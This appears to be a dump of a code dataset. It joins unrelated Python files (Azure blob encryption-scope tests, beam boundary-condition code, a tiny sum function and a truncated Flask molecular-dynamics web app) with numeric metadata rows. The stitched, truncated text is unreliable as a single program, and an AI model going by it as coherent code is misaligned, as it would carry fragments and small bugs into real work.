blob_snapshot = blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_list_blobs(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_list_blobs_using_container_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
token = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
self._create_append_blob(bsc_with_sas_credential)
# generate a token with TEST_ENCRYPTION_KEY_SCOPE
token2 = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE
)
bsc_with_diff_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc_with_diff_sas_credential.get_container_client(self.container_name)
# The ses field in SAS token when list blobs is different from the encryption scope used on creating blob, while
# list blobs should also succeed
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
# and the encryption scope is the same as the one on blob creation
self.assertEqual(blob.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_account_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE_2
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE_2
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
#
sas_token2 = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_account_key_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc_with_account_key_credential.get_blob_client(self.container_name, copied_blob)
# TODO: to confirm with Sean/Heidi ses in SAS cannot be set for async copy.
# The test failed for async copy (without requires_sync=True)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_blob_from_url_with_ecryption_scope(self, storage_account_name, storage_account_key):
# Arrange
# create sas for source blob
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc.get_blob_client(self.container_name, copied_blob)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True,
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_user_delegation_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
# to get user delegation key
oauth_token_credential = self.generate_oauth_token()
service_client = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=oauth_token_credential,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
user_delegation_key = service_client.get_user_delegation_key(datetime.utcnow(),
datetime.utcnow() + timedelta(hours=1))
self._setup(service_client)
blob_name = self.get_resource_name('blob')
sas_token = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=user_delegation_key,
permission=BlobSasPermissions(read=True, write=True, create=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_delegation_sas = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_delegation_sas, blob_name=blob_name, data=b'AAABBBCCC', overwrite=True)
props = blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(service_client)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container('cpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
for container in bsc.list_containers(name_starts_with='cpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
blob_client = container_client.get_blob_client("appendblob")
# providing encryption scope when upload the blob
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Use the provided encryption scope on the blob
self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
container_client.delete_container()
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n_deny_override(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container(
'denyoverridecpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
for container in bsc.list_containers(name_starts_with='denyoverridecpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
blob_client = container_client.get_blob_client("appendblob")
# It's not allowed to set encryption scope on the blob when the container denies encryption scope override.
with self.assertRaises(HttpResponseError):
blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
container_client.delete_container()
# ------------------------------------------------------------------------------
| 45.742026
| 139
| 0.671315
| 5,638
| 48,761
| 5.415218
| 0.056935
| 0.070748
| 0.046674
| 0.038911
| 0.883757
| 0.866169
| 0.845731
| 0.824736
| 0.807638
| 0.785005
| 0
| 0.017835
| 0.247985
| 48,761
| 1,065
| 140
| 45.784977
| 0.814775
| 0.11743
| 0
| 0.753567
| 0
| 0
| 0.035681
| 0.009725
| 0
| 0
| 0
| 0.000939
| 0.151751
| 1
| 0.036316
| false
| 0.002594
| 0.007782
| 0.001297
| 0.051881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7f8d8704d1c69449ea4bd1c6ad25f66b054165d
| 10,349
|
py
|
Python
|
boundary_conditions.py
|
viswambhar-yasa/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | 4
|
2020-11-23T15:55:08.000Z
|
2022-01-15T17:47:19.000Z
|
boundary_conditions.py
|
bhan5426/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | null | null | null |
boundary_conditions.py
|
bhan5426/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | 3
|
2021-12-27T01:21:33.000Z
|
2022-03-24T10:50:31.000Z
|
#AUTHOR : YASA VISWAMBHAR REDDY
#MATRICULATION NUMBER : 65074
#Personal Programming Project
#--------------------------------------------------------------------------------------------------------------#
#BOUNDARY CONDITIONS - Python file used to generate boundary conditions (element indices)
#--------------------------------------------------------------------------------------------------------------#
import numpy as np
from Preprocessing import Inputs
class BC_Switcher(object):
'''
A class is used to perform switch cases funtionality to implement boundary conditions.
Option :
0- Cantilever beam with load along the bottom edge of the free end.
1- Simple supported with load at bottom center.
2- Cantilever beam with load at corner point of the free end.
3- Cantilever beam with point load at the free end (2d case loading at y=height and x=length).
4- Cantilever beam with two forces at either end
5- Cantilever beam with load along the center of the free end
6- Simple supported with load at top center.
'''
def __init__(self,CONTROL_POINTS,length,height,width,bc_disp):
self.CONTROL_POINTS=CONTROL_POINTS
self.length=length
self.width=width
self.height=height
self.bc_disp=bc_disp
def indirect(self,i):
method_name='number_'+str(i)
method=getattr(self,method_name,lambda :'0')
return method()
def number_0(self):
#nz should be odd
if self.bc_disp:
width1=120
print('\n')
print('='*width1)
fmt='{:^'+str(width1)+'}'
TBLACK = '\033[33;1m'
ENDC = '\033[m'
print(TBLACK+fmt.format(' Cantilever beam with load along the bottom edge of the free end')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==0])
fixed_indicies=np.sort(np.concatenate((fixed_nodes*dof,dof*fixed_nodes+1,fixed_nodes*dof+2)))
#load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==0] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_1(self):
#nx and ny should be odd elements
if self.bc_disp:
width=120
print('\n')
print('='*width)
TBLACK ='\033[33;1m' # Green Text
ENDC = '\033[m'
fmt='{:^'+str(width)+'}'
print(TBLACK+fmt.format(' Simple supported with load at bottom center')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes1=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if ((self.CONTROL_POINTS[index,0]==0 ) and self.CONTROL_POINTS[index,1]==0 and (self.CONTROL_POINTS[index,2]==0 or self.CONTROL_POINTS[index,2]==self.width))])
fixed_indicies1=np.sort(np.concatenate((fixed_nodes1*dof,dof*fixed_nodes1+1,fixed_nodes1*dof+2)))
fixed_nodes2=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if ((self.CONTROL_POINTS[index,0]==self.length ) and self.CONTROL_POINTS[index,1]==0 and (self.CONTROL_POINTS[index,2]==0 or self.CONTROL_POINTS[index,2]==self.width))])
fixed_indicies2= np.sort(np.concatenate((dof*fixed_nodes2+1,fixed_nodes2*dof+2)))
fixed_nodes=np.sort(np.concatenate((fixed_nodes1,fixed_nodes2)))
fixed_indicies=np.sort(np.concatenate((fixed_indicies1,fixed_indicies2)))
# load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length/2 and self.CONTROL_POINTS[index,1]==0 and self.CONTROL_POINTS[index,2]==self.width/2 )] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_2(self):
if self.bc_disp:
width=120
print('\n')
print('='*width)
TBLACK = '\033[33;1m'
ENDC = '\033[m'
fmt='{:^'+str(width)+'}'
print(TBLACK+fmt.format(' Cantilever beam with load at corner point of free end')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==0])
fixed_indicies=np.sort(np.concatenate((fixed_nodes*dof,dof*fixed_nodes+1,fixed_nodes*dof+2)))
# load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==0 and self.CONTROL_POINTS[index,2]==0) ] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_3(self):
if self.bc_disp:
width1=120
print('\n')
print('='*width1)
TBLACK = '\033[33;1m'
ENDC = '\033[m'
fmt='{:^'+str(width1)+'}'
print(TBLACK+fmt.format('Cantilever beam with point load at the free end (2d case loading at y=height and x=length) ')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==0])
fixed_indicies=np.sort(np.concatenate((fixed_nodes*dof,dof*fixed_nodes+1,fixed_nodes*dof+2)))
# load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==0 and self.CONTROL_POINTS[index,2]==self.width/2 )] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_4(self):
if self.bc_disp:
width=120
print('\n')
print('='*width)
fmt='{:^'+str(width)+'}'
TBLACK = '\033[33;1m'
ENDC = '\033[m'
print(TBLACK+fmt.format('Cantilever beam with two forces at either end')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==0])
fixed_indicies=np.sort(np.concatenate((fixed_nodes*dof,dof*fixed_nodes+1,fixed_nodes*dof+2)))
# load nodes and indices are calculated
load_nodes=[]
load_indicies=[]
load_nodes1=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==0 and self.CONTROL_POINTS[index,2]==self.width/2)])
load_nodes.append(load_nodes1)
load_indicies.append(np.sort((dof*load_nodes1+1)))
load_nodes1=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==self.height and self.CONTROL_POINTS[index,2]==self.width/2)])
load_nodes.append(load_nodes1)
load_indicies.append(np.sort((dof*load_nodes1+1)))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_5(self):
#ny and nz should be odd
if self.bc_disp:
width1=120
print('\n')
print('='*width1)
fmt='{:^'+str(width1)+'}'
TBLACK = '\033[33;1m'
ENDC = '\033[m'
print(TBLACK+fmt.format(' Cantilever beam with load along the center of the free end')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==0])
fixed_indicies=np.sort(np.concatenate((fixed_nodes*dof,dof*fixed_nodes+1,fixed_nodes*dof+2)))
# load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if self.CONTROL_POINTS[index,0]==self.length and self.CONTROL_POINTS[index,1]==self.height/2 and self.CONTROL_POINTS[index,2]==self.width/2] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
def number_6(self):
#nx and ny should be odd elements
if self.bc_disp:
width=120
print('\n')
print('='*width)
TBLACK ='\033[33;1m' # Green Text
ENDC = '\033[m'
fmt='{:^'+str(width)+'}'
print(TBLACK+fmt.format(' Simple supported with load at bottom center')+ENDC)
dof=3
# fixed nodes and indices are calculated
fixed_nodes1=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if ((self.CONTROL_POINTS[index,0]==0 ) and self.CONTROL_POINTS[index,1]==0 and (self.CONTROL_POINTS[index,2]==0 or self.CONTROL_POINTS[index,2]==self.width))])
fixed_indicies1=np.sort(np.concatenate((fixed_nodes1*dof,dof*fixed_nodes1+1,fixed_nodes1*dof+2)))
fixed_nodes2=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if ((self.CONTROL_POINTS[index,0]==self.length ) and self.CONTROL_POINTS[index,1]==0 and (self.CONTROL_POINTS[index,2]==0 or self.CONTROL_POINTS[index,2]==self.width))])
fixed_indicies2= np.sort(np.concatenate((dof*fixed_nodes2+1,fixed_nodes2*dof+2)))
fixed_nodes=np.sort(np.concatenate((fixed_nodes1,fixed_nodes2)))
fixed_indicies=np.sort(np.concatenate((fixed_indicies1,fixed_indicies2)))
# load nodes and indices are calculated
load_nodes=np.array([index for index,j in enumerate(self.CONTROL_POINTS) if (self.CONTROL_POINTS[index,0]==self.length/2 and self.CONTROL_POINTS[index,1]==self.height and self.CONTROL_POINTS[index,2]==self.width/2 )] )
load_indicies=np.sort((dof*load_nodes+1))
return fixed_indicies,load_indicies,fixed_nodes,load_nodes
| 50.237864
| 252
| 0.641221
| 1,468
| 10,349
| 4.382834
| 0.089237
| 0.129313
| 0.166459
| 0.150451
| 0.907833
| 0.903326
| 0.903171
| 0.894311
| 0.873485
| 0.869288
| 0
| 0.031366
| 0.217509
| 10,349
| 206
| 253
| 50.237864
| 0.763151
| 0.159726
| 0
| 0.734848
| 0
| 0.007576
| 0.066141
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.015152
| 0
| 0.151515
| 0.159091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bdebe9871a3607566546160e6ca45aeb8acf508
| 38
|
py
|
Python
|
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
def soma(n1,n2):
return (n1 + n2)
| 12.666667
| 20
| 0.552632
| 7
| 38
| 3
| 0.714286
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.263158
| 38
| 2
| 21
| 19
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0be5a8dfd91d689ef2ca3245b82fc7c492088a87
| 70,311
|
py
|
Python
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 6
|
2020-07-18T05:17:28.000Z
|
2022-03-31T09:58:40.000Z
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 4
|
2020-02-05T14:59:25.000Z
|
2022-03-23T19:45:00.000Z
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 1
|
2022-01-15T13:56:28.000Z
|
2022-01-15T13:56:28.000Z
|
from os import path, remove
from app import app, login_manager, db
from flask import render_template, request, redirect, url_for, flash, send_file, current_app
from .models import User
from flask_login import logout_user, login_required, login_user, current_user
from .config import os, Config
from .generate import generate
from .generateLig import generateLig
from .generateLigACPYPE import generateLigACPYPE
from .execute import execute
from .executeLig import executelig
from .executeLigACPYPE import executeLigACPYPE
from .upload_file import upload_file, upload_file_ligante
from .checkuserdynamics import CheckUserDynamics, CheckUserDynamicsLig, CheckDynamicsSteps, CheckDynamicsStepsLig
from .admin_required import admin_required
import ast
import errno
import zipfile
import glob
import smtplib
import shutil
from email.mime.text import MIMEText
### cadastro br ###
@app.route('/cadastro', methods=['GET', 'POST'])
def cadastro():
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
#faz checagem para verificar se usuário ou senha já são utilizados
check_email = User.query.filter(User.email == email).first()
check_user = User.query.filter(User.username == user).first()
if check_email is None and check_user is None:
new = User(name=name,username=user,email=email,register='False')
new.set_password(password)
db.session.add(new)
db.session.commit()
flash('Solicitação de cadastro do(a) Usuário(a) {} realizada com sucesso. Em breve responderemos por Email se a solicitação foi aceita.'.format(user), 'primary')
return redirect(url_for('login'))
else:
flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
return redirect(url_for('cadastro'))
flash('Por favor, preencha os dados corretamente. Em caso de dados incorretos a solicitação de cadastro será cancelada.', 'danger')
return render_template('cadastro.html')
### cadastro en ###
@app.route('/cadastro_en', methods=['GET', 'POST'])
def cadastro_en():
if request.method == 'POST':
name = request.form.get('name')
user = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
passconfirm = request.form.get('passwordconfirm')
#checks to see if a username or password is already used
check_email = User.query.filter(User.email == email).first()
check_user = User.query.filter(User.username == user).first()
if check_email is None and check_user is None:
new = User(name=name,username=user,email=email,register='False')
new.set_password(password)
db.session.add(new)
db.session.commit()
flash('User registration request {} carried out successfully. We will respond by email shortly if the request has been accepted. '.format(user), 'primary')
return redirect(url_for('login_en'))
else:
flash('Error, email or user are already being used.', 'danger')
return redirect(url_for('cadastro_en'))
flash('Please fill in the data correctly. In case of incorrect data, the registration request will be canceled.', 'danger')
return render_template('cadastro_en.html')
########################
####login br#####
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
form_entry = request.form.get('username')
user = User.query.filter((User.username == form_entry) | (User.email == form_entry)).first()
#verifica se o usuário existe
if user is None or not user.check_password(request.form.get('password')):
flash('Usuário ou senha inválidos', 'danger')
return render_template('login.html')
#verifica se o cadastro do usuário é aceito.
if user.register == 'False':
flash('Seu cadastro ainda não foi aceito, aguarde o Email de confirmação.', 'danger')
else :
login_user(user)
return redirect(url_for('protected'))
return render_template('login.html')
@app.route('/protected')
@login_required
def protected():
flash('Olá {}, seja bem-vindo(a)'.format(current_user.username), 'primary')
return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'], endpoint='index')
@login_required
def index():
try:
directory = Config.UPLOAD_FOLDER + '/' + current_user.username +'/info_dynamics'
info_dynamics = open(directory,'r')
list_dynamics = info_dynamics.readlines()
return render_template('index.html', actindex = 'active', list_dynamics = list_dynamics)
except:
flash('Você ainda não realizou nenhuma dinâmica.', 'danger')
return render_template('index.html', actindex = 'active')
########################
#####login_en#####
@app.route('/login_en', methods=['GET', 'POST'])
def login_en():
if request.method == 'POST':
form_entry = request.form.get('username')
user = User.query.filter((User.username == form_entry) | (User.email == form_entry)).first()
#checks if the user exists
if user is None or not user.check_password(request.form.get('password')):
flash('Username or password is invalid ', 'danger')
return render_template('login_en.html')
#checks if the user registration is accepted.
if user.register == 'False':
flash('Your registration has not yet been accepted, wait for the confirmation email.', 'danger')
else :
login_user(user)
return redirect(url_for('protected_en'))
return render_template('login_en.html')
@app.route('/protected_en')
@login_required
def protected_en():
flash('Hi {}, Welcome'.format(current_user.username), 'primary')
return redirect(url_for('index_en'))
@app.route('/en', methods=['GET', 'POST'], endpoint='index_en')
@login_required
def index_en():
try:
directory = Config.UPLOAD_FOLDER + '/' + current_user.username +'/info_dynamics'
info_dynamics = open(directory,'r')
list_dynamics = info_dynamics.readlines()
return render_template('index_en.html', actindex = 'active', list_dynamics = list_dynamics)
except:
flash('You havent performed any dynamics yet.', 'danger')
return render_template('index_en.html', actindex = 'active')
#################################
### livre br ###
@app.route('/livre', methods=['GET', 'POST'], endpoint='livre')
@login_required
def livre():
if request.method == 'POST':
file = request.files.get('file')
CompleteFileName = generate(file.filename,
request.form.get('campoforca'),
request.form.get('modeloagua'),
request.form.get('tipocaixa'),
request.form.get('distanciacaixa'),
request.form.get('neutralize'),
request.form.get('double'),
request.form.get('ignore'),
current_user
)
if request.form.get('download') == 'Download':
return redirect(url_for('commandsdownload',
filename={"complete" : CompleteFileName,
"name": file.filename.split('.')[0]}))
if request.form.get('execute') == 'Executar':
if upload_file(file, current_user.username):
#checar se servidor esta em execução
executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
if not os.path.exists(executing):
f = open(executing,'w')
f.writelines('{}\n'.format(current_user.username))
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('livre'))
executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
if not os.path.exists(executingLig):
f = open(executingLig, 'w')
f.close()
else:
flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
return redirect(url_for('livre'))
#preparar para executar
MoleculeName = file.filename.split('.')[0]
filename = file.filename
AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
current_user.username, MoleculeName , 'run',
'logs/', filename)
exc = execute(AbsFileName, CompleteFileName, current_user.username, MoleculeName)
flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
else:
flash('Extensão do arquivo está incorreta', 'danger')
if CheckUserDynamics(current_user.username) == True:
flash('','steps')
steplist = CheckDynamicsSteps(current_user.username)
archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executing', "r")
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em produçãomd
if last_line == '#productionmd\n':
